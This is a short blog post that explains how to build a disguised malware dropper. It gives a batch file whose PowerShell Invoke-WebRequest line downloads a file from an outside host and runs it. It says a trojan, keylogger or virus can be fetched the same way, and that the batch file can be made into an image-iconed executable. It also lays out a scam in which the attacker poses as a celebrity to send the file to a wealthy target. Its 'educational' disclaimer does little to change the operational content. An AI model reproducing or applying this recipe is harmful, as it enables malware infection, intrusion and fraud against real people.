Friday, July 22, 2022

A Basic Backdoor Creation Technique

Hackers do find clever ways to evade detection. There are a number ways to do this like for example a hacker was able to steal money from Axie(the latest news) by inserting a trojan on a pdf file that supposedly contained a job offer. The employee was approached while at work and after a series of online interviews, the recruiter told him they are willing to hire him and sent him the pdf job offer document. The employee downloaded the file at his work station and opened and the hacker gained access to the company's network infrastructure resulting in multi-million dollar heist.

Today I will create how the hacker did this in its most basic way and always remember that this is just for educational purposes only. DONOT use this for any illegal purposes.

 Create a batch file with following command:


1
2
3
PowerShell -Command "Invoke-WebRequest 'https://web.com/image.JPG' -OutFile c:\TEMP\matrix.png"

c:\TEMP\matrix.png

The above command is an instruction to download an image and save it at c:\temp. Since it is a batch file, you can actually create another line of code which is identical to the first but instead of an image, you can specify a program that contains malicious code like a trojan(gate opener or creates a backdoor), a keylogger, a virus, etc. 

The .bat file is already executable but it is still very obvious, you you need to disguise it as an image. The scenario is you are impersonating a celebrity and you are chatting with a rich businessman and when you are asked to send your photo, you need to show it at the chat room as an image, of course you can not send it as .bat file. So to disguise the application, you will need to convert it into an executable file. You may use a bat to exe converter and you assign an icon to the exe file resulting in a disguised image in the chatroom. 


Once the file was downloaded and opened, the image will be shown and at the same time the other application gets downloaded and executed. 

You will need to disable your antivirus while doing this experiment.


No comments:

Post a Comment